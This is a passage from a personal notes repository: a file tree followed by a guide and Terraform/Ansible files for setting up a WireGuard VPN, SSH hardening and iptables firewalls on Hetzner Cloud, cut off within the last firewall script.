├── .gitignore ├── 2019-07-28-wireguard-setup-guide ├── README.md ├── ansible │ ├── ansible.cfg │ ├── inventory │ │ └── hosts.yml │ ├── roles │ │ ├── ssh-keys │ │ │ ├── README.md │ │ │ ├── tasks │ │ │ │ └── main.yml │ │ │ ├── templates │ │ │ │ └── authorized_keys.j2 │ │ │ └── vars │ │ │ │ └── main.yml │ │ ├── sshd │ │ │ ├── README.md │ │ │ ├── files │ │ │ │ └── sshd_config │ │ │ ├── handlers │ │ │ │ └── main.yml │ │ │ └── tasks │ │ │ │ └── main.yml │ │ ├── wireguard-config │ │ │ ├── README.md │ │ │ ├── tasks │ │ │ │ └── main.yml │ │ │ ├── templates │ │ │ │ └── example.wg0.conf.j2 │ │ │ └── vars │ │ │ │ └── example.wg0.yml │ │ └── wireguard-install │ │ │ ├── README.md │ │ │ └── tasks │ │ │ └── main.yml │ ├── ssh-keys.yml │ ├── sshd.yml │ ├── wireguard-config.yml │ └── wireguard-install.yml └── tf │ ├── main.tf │ ├── outputs.tf │ ├── user-data │ ├── test.sh │ └── wireguard.sh │ └── variables.tf ├── 2019-08-02-vpn-own-dns ├── README.md └── ansible │ ├── ansible.cfg │ ├── coredns-config.yml │ ├── coredns-install.yml │ ├── inventory │ └── hosts.yml │ └── roles │ ├── coredns-config │ ├── README.md │ ├── defaults │ │ └── main.yml │ ├── files │ │ └── default │ │ │ ├── Corefile │ │ │ └── db.example.com │ └── tasks │ │ └── main.yml │ └── coredns-install │ ├── README.md │ ├── files │ ├── Corefile │ ├── coredns.service │ └── resolv.conf │ └── tasks │ └── main.yml ├── 2019-08-04-dos-insight-api ├── README.md ├── bitcore-node-pubkey │ ├── index.js │ ├── package.json │ ├── utxo-stats │ └── yarn.lock ├── bs58-time-chart │ ├── bs58-time.js │ ├── bs58-time.png │ ├── package.json │ └── yarn.lock └── insight-api-dos │ ├── gen-post-body.js │ ├── insight-dos-body.json │ ├── insight-dos.js │ ├── package.json │ └── yarn.lock ├── 2019-08-06-hetzner-cloud-internal-failover-ip ├── README.md └── tf │ ├── main.tf │ ├── outputs.tf │ └── variables.tf ├── 2019-08-18-loadbalancer-iptables-ipvs ├── Dockerfile ├── README.md └── docker-compose.yml ├── 2019-08-18-virtual-server-with-keepalived ├── Dockerfile ├── README.md ├── docker-compose.yml └── keepalived.conf ├── 2019-08-19-kubernetes-setup-with-kubeadm ├── README.md └── tf │ ├── main.tf │ ├── outputs.tf │ ├── user-data │ └── default.sh │ └── variables.tf ├── 2019-08-20-k8s-coredns-tune-for-external-domains └── README.md ├── 2019-08-22-nodejs-dns ├── README.md ├── coredns │ ├── Corefile │ └── db.example.com └── js │ ├── dns-lookup-cache.js │ ├── dns-lookup-cache2.js │ ├── dns-lookup.js │ ├── dns-resolve-public-dns.js │ ├── dns-resolve.js │ └── test-fn.js ├── 2019-08-23-systemd-instead-pm2 └── README.md ├── 2019-08-30-node-uvthreads-sync-async └── README.md ├── 2019-08-31-libvirt-usage └── README.md ├── 2019-09-01-npm-package-dependents ├── README.md └── show-dependents.js ├── 2019-09-09-node-global-gc └── README.md ├── 2019-09-12-node-perf-hooks ├── README.md └── examples │ ├── binding.gyp │ ├── function.js │ ├── gc.js │ ├── gcweak.cc │ ├── http.js │ ├── http2.js │ ├── mark-measure.js │ ├── node.js │ ├── package.json │ └── yarn.lock ├── 2019-09-21-node-object-gc-callback └── README.md ├── 2019-09-23-node-module-wrapper └── README.md ├── 2019-09-27-node-promise-leaking └── README.md ├── 2019-12-18-llnode-elliptic ├── README.md ├── llnode.js ├── package.json ├── server.js └── yarn.lock ├── 2020-01-02-github-actions-for-prebuildify └── README.md ├── 2020-01-12-cost-of-npm-scripts ├── README.md ├── lock-babel-core.json ├── lock-browserify.json ├── lock-webpack.json ├── package.json ├── stats.js └── yarn.lock ├── 3rd-party-bookmarked-notes.md ├── Makefile └── README.md 
/.gitignore: -------------------------------------------------------------------------------- 1 | # ansible 2 | *.retry 3 | 4 | # terraform 5 | .terraform 6 | .terraform.tfstate.lock.info 7 | terraform.tfstate 8 | terraform.tfstate.backup 9 | 10 | # node.js 11 | node_modules 12 | package-lock.json 13 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/README.md: -------------------------------------------------------------------------------- 1 | # Secure VPN tunnel with WireGuard 2 | 3 | ### VPN 4 | 5 | Why do we need a VPN at all? Even less than a year ago (mid-2018) I ignored it; everything I did at that time was: set up a server, open the required ports in the firewall (if provided), and install / update software over SSH. It just worked. But there are a few important reasons why you probably should use a VPN: 6 | 7 | - An additional security layer. If you have one server, it is easy to remember which ports should be open and which should be closed. But even in this case, you can quickly forget what has to be done on a server if you switch to other work for a long period of time. With a VPN, on the other hand, you can worry less about open ports (I'm not saying that you should leave unneeded ports open, only that if you forget to close something, the consequences will be smaller). More reading: https://hackernoon.com/leaklooker-find-open-databases-in-a-second-9da4249c8472 8 | - With custom subnets in a VPN you can restrict access from / to services. For example, you can run a database on a server that has no Internet access at all, while the database stays reachable for applications inside the VPN. 9 | - Address persistence. Today you have some public IPs in your inventory for Ansible roles. Tomorrow you recreate a server and its public IP changes. Instead of fixing the inventory, you can rely on a persistent private IP. And it's not only about Ansible; the same goes for DNS records that refer to a server in a private network. 10 | 11 | ### Secure tunnel to VPN 12 | 13 | There are plenty of solutions for organizing a secure tunnel into a VPN; the most used is probably [OpenVPN](https://openvpn.net/). But the problem here is complexity, just check the guide from DigitalOcean (https://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-16-04): so many steps, keys, certs, configs. In the end, will you be sure that everything was done correctly? Also, as I understand it, certificates are usually generated by admins on the server and then handed out to users (at least that was the way at my previous job). Can this be considered secure? Never! It's as if somebody generated your SSH keys for you. 14 | 15 | In comparison, [WireGuard](https://www.wireguard.com/) is super simple. Two commands for creating keys: one for the private key, one for the public key. A simple config in less than 10 lines. Yes, WireGuard lacks some features, but I think it's possible to live without them :) 16 | 17 | So, below I'll provide commands with comments for creating and setting up a WireGuard server with a few servers as a pool (where applications could be located). [Terraform](https://www.terraform.io/) and [Ansible](https://www.ansible.com/) files can be found in the subdirectories `tf` & `ansible`.
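To illustrate the two-command claim above, this is all it takes to produce a key pair by hand (a minimal sketch; the guide below combines both commands into a single one-liner):

```bash
# generate a private key, then derive the matching public key from it
wg genkey > wg0.conf.privatekey
wg pubkey < wg0.conf.privatekey > wg0.conf.publickey
```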
In the end, we will get something like this: 18 | 19 | ![Alt text](https://g.gravizo.com/source/graphviz1?https://raw.githubusercontent.com/fanatid/notes/master/2019-07-28-wireguard-setup-guide/README.md) 20 | 78 | 79 | We don't use `10.0.0.0/24` because it looks like a network reserved by Hetzner (at least the gateway for `10.0.0.0/8` on servers in the network is `10.0.0.1/32`). Hetzner Network does not support firewalls through Terraform yet, so we will use iptables for this. Servers from the test pool will drop all incoming packets on the `eth0` interface (except established TCP connections and ICMP packets). The WireGuard server will have the same rules as the test pool servers, but will also allow SSH connections on port 22 and UDP traffic on port 51820 (WireGuard itself). If you are sure about your configs, you can also close port 22 on the WireGuard server ;) 80 | 81 | ### Infrastructure 82 | 83 | First we need to create our infrastructure. In the cloud era, it's much easier to describe and create it with Terraform. Terraform docs for [Hetzner Cloud](https://www.hetzner.com/cloud): https://www.terraform.io/docs/providers/hcloud/index.html 84 | 85 | Before you run the commands, you need to change a few lines: 86 | 87 | - [tf/variables.tf#L5](tf/variables.tf#L5) -- your Hetzner Cloud token; see how to create one here: https://docs.hetzner.cloud/#overview-getting-started 88 | - [tf/variables.tf#L13](tf/variables.tf#L13) -- the SSH key for access to the servers 89 | 90 | Great, now all you need to do is run 3 commands in the [tf](tf) directory: 91 | 92 | ```bash 93 | terraform init 94 | terraform plan 95 | terraform apply 96 | ``` 97 | 98 | After apply, you should see output close to this: 99 | 100 | ```bash 101 | Apply complete! Resources: 10 added, 0 changed, 0 destroyed. 102 | 103 | Outputs: 104 | 105 | test_pool_ip4 = { 106 | "116.203.93.123" = "10.0.3.1" 107 | "159.69.217.110" = "10.0.3.2" 108 | } 109 | wireguard_ip4 = 195.201.137.40 => 10.0.2.1 110 | ``` 111 | 112 | Now you should have 1 Network with 2 Subnets and 3 Servers in your account. The iptables rules are added by the `user-data` scripts: [wireguard.sh](tf/user-data/wireguard.sh), [test.sh](tf/user-data/test.sh) (for cloud-init examples, see https://cloudinit.readthedocs.io/en/latest/topics/examples.html). As you can note, we also install python there, since it's required for running [Ansible](https://www.ansible.com/) playbooks. 113 | 114 | ### WireGuard setup 115 | 116 | ##### Key generation 117 | 118 | Before we continue, you need to install WireGuard locally: https://www.wireguard.com/install/ 119 | 120 | and generate keys; all you need to do for this is run, as root: 121 | 122 | ```bash 123 | (export i=wg0; cd /etc/wireguard; wg genkey | tee $i.conf.privatekey | wg pubkey > $i.conf.publickey; chmod 600 $i.conf*) 124 | ``` 125 | 126 | Here we create the Private Key with `wg genkey`, write the output to the file `wg0.conf.privatekey` and at the same time pipe it to `wg pubkey` to create the Public Key, which is written to `wg0.conf.publickey`. We also set permission `600` on these files.
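If you later want to check that the stored pair still matches, `wg pubkey` simply re-derives the public key from the private one (a quick sanity check):

```bash
# re-derive the public key and compare it with the stored one
diff <(wg pubkey < /etc/wireguard/wg0.conf.privatekey) /etc/wireguard/wg0.conf.publickey && echo OK
```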
127 | 128 | When you have created the keys, you need to set your Public Key in the Ansible role `wireguard-config`: [ansible/roles/wireguard-config/vars/example.wg0.yml](ansible/roles/wireguard-config/vars/example.wg0.yml) 129 | 130 | ##### Server WireGuard Setup 131 | 132 | For automated installation I created 2 small Ansible roles, so all you need to do is run: 133 | 134 | ```bash 135 | ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -i 'root@195.201.137.40,' ./wireguard-install.yml ./wireguard-config.yml -e 'target=all wg_host=example wg_name=wg0' 136 | ``` 137 | 138 | Do not forget to change `195.201.137.40` to the public IPv4 address that maps to `10.0.2.1`. 139 | 140 | If you did everything as described here and Hetzner Cloud / Terraform / Ansible haven't changed anything, there is only one error you may see: 141 | 142 | ```bash 143 | fatal: [root@195.201.137.40]: FAILED! => {"changed": false, "module_stderr": "/bin/sh: 1: /usr/bin/python: not found\n", "module_stdout": "", "msg": "The module failed to execute correctly, you probably need to set the interpreter.\nSee stdout/stderr for the exact error", "rc": 127} 144 | ``` 145 | 146 | This means that `python` has not been installed by the `user-data` script yet. You probably need to wait a little longer before Ansible is able to work. 147 | 148 | If everything went fine you should see something like: 149 | 150 | ```bash 151 | ok: [root@195.201.137.40] => { 152 | "msg": "Server WireGuard Public Key: u6ez/wlC3G0R83DM+7pDx44GkkvWeywd0iX///YUCxs=" 153 | } 154 | ``` 155 | 156 | If in the future you grant / remove access for users, you need to adjust the users list in [ansible/roles/wireguard-config/vars/example.wg0.yml](ansible/roles/wireguard-config/vars/example.wg0.yml) and use the `wireguard-config` role for uploading and applying the config. 157 | 158 | ##### Local WireGuard config 159 | 160 | Now you have everything for the local WireGuard config; just put it into `/etc/wireguard/wg0.conf` (with permission `600`): 161 | 162 | ```ini 163 | [Interface] 164 | Address = 10.0.1.1/32 165 | PostUp = wg set %i private-key <(cat /etc/wireguard/%i.conf.privatekey) 166 | 167 | [Peer] 168 | PublicKey = u6ez/wlC3G0R83DM+7pDx44GkkvWeywd0iX///YUCxs= 169 | AllowedIPs = 10.0.0.0/8 170 | Endpoint = 195.201.137.40:51820 171 | PersistentKeepalive = 25 172 | ``` 173 | 174 | As you can note, `PublicKey` and `Endpoint` should be changed to the appropriate values. 175 | 176 | And now you can bring the connection up with `wg-quick`: 177 | 178 | ```bash 179 | $ wg-quick up wg0 180 | [#] ip link add wg0 type wireguard 181 | [#] wg setconf wg0 /dev/fd/63 182 | [#] ip -4 address add 10.0.1.1/32 dev wg0 183 | [#] ip link set mtu 1420 up dev wg0 184 | [#] ip -4 route add 10.0.0.0/8 dev wg0 185 | [#] wg set wg0 private-key <(cat /etc/wireguard/wg0.conf.privatekey) 186 | ``` 187 | 188 | If you have the same output, then `ping 10.0.2.1` should work, as should SSH to `10.0.3.1` / `10.0.3.2`. 189 | 190 | For startup on boot you can activate it with `systemd`: `systemctl enable wg-quick@wg0`. 191 | 192 | ##### Reverse route 193 | 194 | Because the users subnet (`10.0.1.0/24`) is not part of the Hetzner Network, we cannot send packets from the test pool servers (`10.0.3.0/24`) to users (the problem is that the gateway `10.0.0.1/32` in the Hetzner Network does not know anything about our WireGuard users).
This can be solved by defining an additional route where all packets with destination `10.0.1.0/24` go to our WireGuard server `10.0.2.1/32`, or in Terraform: 195 | 196 | ```terraform 197 | resource "hcloud_network_route" "reverse" { 198 | network_id = "${hcloud_network.default.id}" 199 | destination = "10.0.1.0/24" 200 | gateway = "10.0.2.1" 201 | } 202 | ``` 203 | 204 | After this, our servers in the private network will be able to initiate communication with our WireGuard users. 205 | 206 | ### SSH keys 207 | 208 | In addition to the WireGuard Ansible roles, I created 2 roles for simple SSH key management on the servers. Before you run them, you need to change the key in [ansible/roles/ssh-keys/vars/main.yml](ansible/roles/ssh-keys/vars/main.yml). 209 | 210 | - Role `sshd` uploads an `sshd_config` that disables password-based authentication. 211 | - Role `ssh-keys` uploads the defined keys to `/root/.ssh/authorized_keys`. Be careful: if your key is not in the list and you run the role, you will lose access to the server! 212 | 213 | ```bash 214 | ansible-playbook -i ./inventory/hosts.yml ./sshd.yml ./ssh-keys.yml -e 'target=all' 215 | ``` 216 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | forks = 10 3 | interpreter_python = /usr/bin/python 4 | 5 | # default user to use for playbooks if user is not specified 6 | # (/usr/bin/ansible will use current user as default) 7 | remote_user = root 8 | 9 | # retry files 10 | # When a playbook fails by default a .retry file will be created in ~/ 11 | # You can disable this feature by setting retry_files_enabled to False 12 | # and you can change the location of the files by setting retry_files_save_path 13 | retry_files_enabled = False 14 | 15 | [inventory] 16 | # enable inventory plugins, default: 'host_list', 'script', 'yaml', 'ini', 'auto' 17 | enable_plugins = yaml, host_list 18 | 19 | [ssh_connection] 20 | 21 | # ssh arguments to use 22 | # Leaving off ControlPersist will result in poor performance, so use 23 | # paramiko on older platforms rather than removing it, -C controls compression use 24 | ssh_args = -C -o ControlMaster=auto -o ControlPersist=60s -o PreferredAuthentications=publickey 25 | 26 | # Enabling pipelining reduces the number of SSH operations required to 27 | # execute a module on the remote server. This can result in a significant 28 | # performance improvement when enabled, however when using "sudo:" you must 29 | # first disable 'requiretty' in /etc/sudoers 30 | # 31 | # By default, this option is disabled to preserve compatibility with 32 | # sudoers configurations that have requiretty (the default on many distros). 33 | # 34 | pipelining = True 35 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/inventory/hosts.yml: -------------------------------------------------------------------------------- 1 | --- 2 | all: 3 | children: 4 | wireguard: 5 | hosts: 6 | # wireguard_ip4 7 | # ? 8 | 10.0.2.1: 9 | test: 10 | hosts: 11 | 10.0.3.1: 12 | 10.0.3.2: 13 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/ssh-keys/README.md: -------------------------------------------------------------------------------- 1 | ## ssh-keys 2 | 3 | Add / remove SSH keys on servers.
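With the default vars below, the rendered file on a server ends up looking like this (a sketch; the key is shortened for readability):

```bash
$ cat /root/.ssh/authorized_keys
# Kirill Fomichev (github.com/fanatid)
ssh-rsa AAAAB3NzaC1yc2E...XU0Oqb Kirill Fomichev (github.com/fanatid)
```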
4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i ./inventory/hosts.yml ./ssh-keys.yml 9 | ``` 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/ssh-keys/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: upload authorized_keys 3 | template: 4 | src: templates/authorized_keys.j2 5 | dest: /root/.ssh/authorized_keys 6 | owner: root 7 | group: root 8 | mode: 0600 9 | become: true 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/ssh-keys/templates/authorized_keys.j2: -------------------------------------------------------------------------------- 1 | {% for item in users|dict2items %} 2 | # {{ item.key }} 3 | {{ item.value }} {{ item.key }} 4 | {# empty line between keys, but not for last key #} 5 | {% if not loop.last %} 6 | 7 | {% endif %} 8 | {% endfor %} 9 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/ssh-keys/vars/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | users: 3 | Kirill Fomichev (github.com/fanatid): ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb 4 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/sshd/README.md: -------------------------------------------------------------------------------- 1 | ## sshd 2 | 3 | Upload sshd config with disabled password-based authentication. 
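After the role has run, you can verify from the outside that password logins are really rejected (a quick check; replace `X.X.X.X` with your server address):

```bash
# force password auth only; with the uploaded config sshd must refuse it
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no root@X.X.X.X
# expected: Permission denied (publickey).
```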
4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i ./inventory/hosts.yml ./sshd.yml -e 'target=all' 9 | ``` 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/sshd/files/sshd_config: -------------------------------------------------------------------------------- 1 | AcceptEnv LANG LC_* 2 | ChallengeResponseAuthentication no 3 | PasswordAuthentication no 4 | PrintMotd no 5 | Subsystem sftp /usr/lib/openssh/sftp-server 6 | UsePAM yes 7 | X11Forwarding yes 8 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/sshd/handlers/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: restart sshd 3 | service: 4 | name: sshd 5 | state: restarted 6 | enabled: yes 7 | become: yes 8 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/sshd/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: upload sshd_config 3 | copy: 4 | src: files/sshd_config 5 | dest: /etc/ssh/sshd_config 6 | owner: root 7 | group: root 8 | mode: 0644 9 | become: true 10 | notify: restart sshd 11 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-config/README.md: -------------------------------------------------------------------------------- 1 | ## wireguard-config 2 | 3 | - Create [WireGuard](https://www.wireguard.com/) Keys if they don't exist yet. 4 | - Update WireGuard configuration for peers from vars. 5 | - Add new / remove outdated peers on the current interface. 6 | - Print the WireGuard Server Public Key.
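After a run you can also inspect the live peer set directly on the server, handy for confirming that a removed user is really gone (assuming the interface is `wg0`):

```bash
# list interface details and all currently configured peers
wg show wg0
```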
7 | 8 | ### usage 9 | 10 | In addition to the playbook `target` variable, 2 extra variables should be defined for the role: 11 | 12 | - `wg_host` -- the name of the wireguard vars / template 13 | - `wg_name` -- the name of the wireguard interface on the host machine 14 | 15 | ```bash 16 | ansible-playbook -i 'root@X.X.X.X,' ./wireguard-config.yml -e 'target=all wg_host=example wg_name=wg0' 17 | ``` 18 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-config/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - block: 3 | # Create Keys if they don't exist 4 | - name: check wg keys 5 | stat: 6 | path: /etc/wireguard/{{ wg_name }}.conf.privatekey 7 | register: wg_privkey 8 | 9 | - name: generate keys 10 | shell: | 11 | cd /etc/wireguard 12 | wg genkey | tee {{ wg_name }}.conf.privatekey | wg pubkey > {{ wg_name }}.conf.publickey 13 | chmod 600 {{ wg_name }}.conf* 14 | when: wg_privkey.stat.exists == False 15 | 16 | 17 | # WireGuard config and service 18 | - name: load users for wireguard 19 | include_vars: 20 | file: vars/{{ wg_host }}.{{ wg_name }}.yml 21 | 22 | - name: upload wireguard conf 23 | template: 24 | src: templates/{{ wg_host }}.{{ wg_name }}.conf.j2 25 | dest: /etc/wireguard/{{ wg_name }}.conf 26 | owner: root 27 | group: root 28 | mode: 0600 29 | register: wg_conf 30 | 31 | - name: activate wireguard 32 | systemd: 33 | name: wg-quick@{{ wg_name }}.service 34 | state: started 35 | enabled: yes 36 | 37 | - name: add / remove wireguard peers 38 | shell: | 39 | # add new peers 40 | wg addconf {{ wg_name }} <(wg-quick strip {{ wg_name }}) 41 | 42 | # remove missed peers 43 | # done this way because wg setconf drops established connections 44 | wg show {{ wg_name }} | grep peer | awk '{ print $2 }' | xargs -L1 -I{} bash -c 'if ! 
wg-quick strip {{ wg_name }} | grep -q "^PublicKey = {}$"; then wg set {{ wg_name }} peer {} remove; fi' 45 | args: 46 | executable: /bin/bash 47 | when: wg_conf.changed 48 | 49 | 50 | # Print Public Key 51 | - name: read remote Public Key 52 | shell: cat /etc/wireguard/{{ wg_name }}.conf.publickey 53 | changed_when: false 54 | register: wg_pubkey 55 | 56 | - name: print server Public Key 57 | debug: 58 | msg: "Server WireGuard Public Key: {{ wg_pubkey.stdout }}" 59 | 60 | become: true 61 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-config/templates/example.wg0.conf.j2: -------------------------------------------------------------------------------- 1 | [Interface] 2 | Address = 10.0.2.1/24 3 | ListenPort = 51820 4 | PostUp = wg set %i private-key <(cat /etc/wireguard/%i.conf.privatekey); iptables -t nat -A POSTROUTING -o ens10 -s 10.0.0.0/8 -j MASQUERADE 5 | PostDown = iptables -t nat -D POSTROUTING -o ens10 -s 10.0.0.0/8 -j MASQUERADE 6 | {% for user in users %} 7 | 8 | # {{ user.comment }} 9 | [Peer] 10 | PublicKey = {{ user.publickey }} 11 | AllowedIPs = {{ user.ips }} 12 | {% endfor %} 13 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-config/vars/example.wg0.yml: -------------------------------------------------------------------------------- 1 | --- 2 | users: 3 | - comment: Kirill Fomichev 4 | publickey: DRr6TRMaX84Em1DlPsgRX1jt+4F5kmkt/iC0mHfD1Tc= 5 | ips: 10.0.1.1/32 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-install/README.md: -------------------------------------------------------------------------------- 1 | ## wireguard-install 2 | 3 | Install [WireGuard](https://www.wireguard.com/). 
4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i 'root@X.X.X.X,' ./wireguard-install.yml -e 'target=all' 9 | ``` 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-install/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - block: 3 | - name: install software-properties-common 4 | apt: 5 | name: 6 | - software-properties-common 7 | state: present 8 | cache_valid_time: 86400 9 | 10 | - name: add wireguard apt repository 11 | apt_repository: 12 | repo: ppa:wireguard/wireguard 13 | 14 | - name: fetch current kernel version 15 | shell: uname -r 16 | register: kernelversion 17 | changed_when: false 18 | 19 | - name: install wireguard 20 | apt: 21 | name: 22 | - linux-headers-generic 23 | - linux-headers-{{ kernelversion.stdout }} 24 | - wireguard 25 | state: present 26 | cache_valid_time: 86400 27 | 28 | - name: Add wireguard module 29 | modprobe: 30 | name: wireguard 31 | state: present 32 | 33 | - name: add ip forwarding to sysctl.conf 34 | sysctl: 35 | name: net.ipv4.ip_forward 36 | value: 1 37 | 38 | become: true 39 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/ssh-keys.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target | default('all') }}" 3 | gather_facts: false 4 | roles: 5 | - name: ssh-keys 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/sshd.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target | default('all') }}" 3 | gather_facts: false 4 | roles: 5 | - name: sshd 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/wireguard-config.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target }}" 3 | gather_facts: false 4 | roles: 5 | - name: wireguard-config 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/wireguard-install.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target }}" 3 | gather_facts: false 4 | roles: 5 | - name: wireguard-install 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/main.tf: -------------------------------------------------------------------------------- 1 | provider "hcloud" { 2 | version = "~> 1.11" 3 | token = "${var.hcloud_token}" 4 | } 5 | 6 | # SSH keys 7 | resource "hcloud_ssh_key" "default" { 8 | count = "${length(var.ssh_keys)}" 9 | 10 | name = "${keys(var.ssh_keys)[count.index]}" 11 | public_key = "${values(var.ssh_keys)[count.index]}" 12 | } 13 | 14 | # Private Network and subnets 15 | resource "hcloud_network" "default" { 16 | name = "WireGuard Example" 17 | ip_range = "10.0.0.0/8" 18 | } 19 | 20 | resource "hcloud_network_subnet" "vpn" { 21 | network_id = "${hcloud_network.default.id}" 22 | type = "server" 23 | network_zone = "eu-central" 24 | ip_range = "10.0.2.0/24" 25 | } 26 | 27 | resource "hcloud_network_subnet" "test" { 28 | network_id = "${hcloud_network.default.id}" 29 | type = "server" 30 | network_zone = "eu-central" 31 | ip_range = "10.0.3.0/24" 32 | 
} 33 | 34 | # WireGuard Server 35 | resource "hcloud_server" "wireguard" { 36 | name = "wireguard" 37 | image = "${var.wireguard_server.image}" 38 | server_type = "${var.wireguard_server.server_type}" 39 | datacenter = "${var.wireguard_server.datacenter}" 40 | user_data = "${file("./user-data/wireguard.sh")}" 41 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 42 | 43 | lifecycle { 44 | prevent_destroy = true 45 | } 46 | } 47 | 48 | resource "hcloud_server_network" "wireguard_network" { 49 | network_id = "${hcloud_network.default.id}" 50 | server_id = "${hcloud_server.wireguard.id}" 51 | ip = "10.0.2.1" 52 | } 53 | 54 | # Test Nodes 55 | resource "hcloud_server" "test" { 56 | count = "${var.test_pool_size}" 57 | 58 | name = "test-${count.index}" 59 | image = "${var.test_pool_server.image}" 60 | server_type = "${var.test_pool_server.server_type}" 61 | datacenter = "${var.test_pool_server.datacenter}" 62 | user_data = "${file("./user-data/test.sh")}" 63 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 64 | } 65 | 66 | resource "hcloud_server_network" "test_network" { 67 | count = length(hcloud_server.test) 68 | 69 | network_id = "${hcloud_network.default.id}" 70 | server_id = "${hcloud_server.test[count.index].id}" 71 | ip = "10.0.3.${count.index + 1}" 72 | } 73 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/outputs.tf: -------------------------------------------------------------------------------- 1 | output "wireguard_ip4" { 2 | description = "Map of public ipv4 to private ipv4 for VPN (WireGuard) Server" 3 | value = "${hcloud_server.wireguard.ipv4_address} => ${hcloud_server_network.wireguard_network.ip}" 4 | } 5 | 6 | output "test_pool_ip4" { 7 | description = "Map of public ipv4 addresses to private ipv4 address of Servers from test pool" 8 | value = { for i in range(length(hcloud_server.test)) : hcloud_server.test[i].ipv4_address => hcloud_server_network.test_network[i].ip } 9 | } 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/user-data/test.sh: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | packages: 3 | - python 4 | - iptables-persistent 5 | runcmd: 6 | - iptables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 7 | - iptables -A INPUT -i eth0 -p icmp -j ACCEPT # Allow ICMP 8 | - iptables -A INPUT -i eth0 -j DROP # Drop rest 9 | - iptables-save > /etc/iptables/rules.v4 # Save ipv4 rules 10 | 11 | - ip6tables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 12 | - ip6tables -A INPUT -i eth0 -p icmpv6 -j ACCEPT # Allow ICMP 13 | - ip6tables -A INPUT -i eth0 -j DROP # Drop rest 14 | - ip6tables-save > /etc/iptables/rules.v6 # Save ipv6 rules 15 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/user-data/wireguard.sh: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | packages: 3 | - python 4 | - iptables-persistent 5 | runcmd: 6 | - iptables -A INPUT -i eth0 -p udp --dport 51820 -j ACCEPT # Allow WireGuard 7 | - iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT # Allow SSH 8 | - iptables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 9 | - iptables -A INPUT -i eth0 -p icmp -j ACCEPT # Allow ICMP 10 | - iptables -A INPUT -i eth0 -j DROP # 
